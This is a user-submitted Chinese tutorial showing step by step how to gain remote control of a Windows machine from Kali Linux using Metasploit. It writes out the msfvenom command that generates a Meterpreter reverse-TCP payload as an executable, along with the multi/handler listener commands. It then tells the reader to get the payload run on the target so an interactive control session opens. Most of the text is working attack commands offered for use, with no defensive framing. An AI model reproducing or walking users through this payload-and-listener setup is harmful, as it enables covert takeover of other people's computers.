Kali远程控制Windows系统(Metasploit)

网友投稿 1672 2022-09-15

Kali远程控制Windows系统(Metasploit)

Kali远程控制Windows系统(Metasploit)

一、在Kali Linux中生成被控端

​第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:​

-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的set lport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/payload.exe

​第二步:​然后把上面在kali中生成的payload.exe移动到Windows系统中

二、在Kali Linux中启动主控端

​第一步:​在kali中输入msfconsole命令启动Metasploit工具

msfconsole

​第二步:​输入下面的命令,在Metasploit中使用handler作为主动端,这个handler位于exploit下的multi目录下

use exploit/multi/handler

​第三步:​设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

​第四步:​设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

​最后一步:​执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处

exploit

三、执行远程控制软件

上面生成了远程控制的被控端与主控端之后,现在来执行被控端的软件,执行之后,被控端就与主控端连接了​第一步:​在Windows中双击这个软件

​第二步:​执行之后,可以看到kali主控端连接上了被控端。并且开启了meterpreter会话

​第三步:​现在主控端可以输入命令来操作被控端(注意,虽然被控端是windows平台,但是使用的命令是主控端系统所使用的命令)

版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:2019-1-5-Windows-的-Pen-协议
下一篇:C# Log4Net学习笔记:记录日志到数据库(乘风破浪的姐姐第三季)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~